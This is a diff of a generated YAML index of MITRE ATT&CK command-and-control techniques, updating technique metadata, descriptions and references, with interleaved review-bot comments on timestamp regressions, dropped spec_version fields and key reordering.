- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37918,7 +38385,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37946,42 +38413,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -37990,17 +38437,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
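Review bot: `x_mitre_permissions_required: [User]` is dropped from T1102 here, and the same happens on the other objects refreshed to `x_mitre_attack_spec_version: 3.2.0` in this diff (T1001.003, T1213.002), while objects that only lose their `spec_version` line keep it (T1205.001 and T1102.003 below still list `- User`). That pattern is consistent with the field being retired in newer upstream objects, but it should be stated in the commit message so nobody reads it as a lossy export. The rest of the hunk is key relocation (`type`, `id`, `created`, `external_references` now sit below the detection text) around the one substantive change, `x_mitre_version: '1.1'` → `'1.2'` with the BirdyClient reference; a stable key order in the emitter would reduce such hunks to the lines that actually change.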
@@ -38032,7 +38501,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
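Review bot: `modified` moves backwards here, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-27T20:54:28.287Z'`, and the same regression appears on T1104, T1102.003, T1102.002, T1132.002, T1001.002, T1008, T1102.001 and T1560.003 (all from the 2021-04-29 stamp to a 2020 stamp), on T1205.001 (2022-05-11 to 2022-03-11) and on T1602 (2022-05-11 to 2022-04-19). A timestamp that decreases on objects whose content is otherwise unchanged points to the index having been regenerated from a different ATT&CK export than last time, not to an upstream edit; name the release and source repository in the commit message, and confirm nothing downstream uses `modified` to decide which copy of an object is newer.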
@@ -38049,8 +38518,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
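Review bot: this is the first of many hunks whose only change is removing `spec_version: '2.1'` together with `x_mitre_attack_spec_version: 2.1.0`, with no replacement appearing in the hunk; the same two-line removal recurs on T1104, T1205.001, T1102.003, T1102.002, T1132.002, T1001.002, T1008, T1102.001 and T1560.003, and the single-line `spec_version` removal on nearly every 3.x object in the file. `spec_version` is the STIX 2.1 marker, so its disappearance suggests the generator now reads STIX 2.0-shaped objects; check that any loader or schema validation that keyed on it, or on the presence of an attack spec version on every technique, tolerates its absence before merging.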
@@ -38070,7 +38537,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38093,8 +38560,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -38119,7 +38584,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38144,8 +38609,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -38210,7 +38673,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -38234,7 +38696,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38259,21 +38721,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
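Review bot: the description switches from the `|-` block literal to a double-quoted scalar with `\n\n` escapes and a `\ ` escape in front of `Protocols such as ICMP`, which is a serializer style change rather than a content change and makes the paragraph breaks and the doubled space before `Protocols` hard to review; configure the emitter to keep long multi-line strings in block style so only the real edit shows. The real edit is the added ORB sentence, `Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations.`, with its `(Citation: ORB Mandiant)` key; that key needs a matching `source_name` in `external_references`, and the stray space between the citation marker and the following `\n\n` is carried from upstream and should not be patched locally.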
@@ -38292,7 +38769,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -38306,6 +38783,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38319,12 +38801,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38374,11 +38855,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38387,20 +38867,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
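Review bot: nothing changes in this hunk except the position of `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique`, which move from after `x_mitre_platforms` to before it; the values are identical. Reorder-only hunks like this one, and the larger relocations on T1102, T1001.003 and T1213.002, make up most of this diff, so sorting keys or preserving the previous key order in the emitter would make future regenerations reviewable at a glance.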
@@ -38425,17 +38905,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
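Review bot: the `change_rdp_port_conti` reference changes both its URL (`twitter.com` → `x.com`) and its `Retrieved` date (March 1, 2022 → September 12, 2024), and the date matches the object's new `modified: '2024-09-12T19:37:57.868Z'`, so this is a genuine upstream refresh rather than a local rewrite and can be taken as-is. `x_mitre_attack_spec_version` goes 3.1.0 → 3.2.0 while `x_mitre_version` stays at `'1.1'`, the expected shape for a metadata-only bump, which confirms the content of T1571 is unchanged.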
@@ -38491,7 +38970,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -38516,7 +38994,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -38553,8 +39031,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -38608,7 +39084,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38680,33 +39155,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
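Review bot: the rename from `Protocol Impersonation` to `Protocol or Service Impersonation` keeps the key `T1001.003` and the `attack-pattern--c325b232-...` id, so object identity is stable, but any generated artifact that carries the technique name as text (index CSVs, per-platform tables, search indexes) has to be regenerated in the same change or it will disagree with this file. The removed leading block (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `external_references`) is a relocation, not a deletion; verify the re-emitted copy lower in the object lists the same three platforms and the same Birmingham reference.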
@@ -38714,23 +39168,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
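Review bot: the `Malleable-C2-U42` reference's description, `'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj. (2022, March 16). ...'`, runs the author names together with no separators and spells the last author `Siddhart`; that is what upstream publishes, so leave it here and raise it against the ATT&CK data instead of hand-editing a generated file. Otherwise the hunk is consistent: both new citation keys in the description (`ESET Okrum July 2019`, `Malleable-C2-U42`) have matching `source_name` entries, the `x_mitre_version` jump from `'1.0'` to `'2.0'` is the right magnitude for a rename plus scope change, and the detection text is unchanged.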
@@ -38777,7 +39269,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38837,7 +39328,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38869,7 +39359,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -38895,8 +39385,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38963,7 +39451,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -39061,7 +39548,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -39154,7 +39640,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -39178,7 +39663,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -39201,8 +39686,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -39227,7 +39710,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -39247,8 +39730,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -39302,7 +39783,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -39327,7 +39807,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39353,8 +39833,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -39408,7 +39886,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
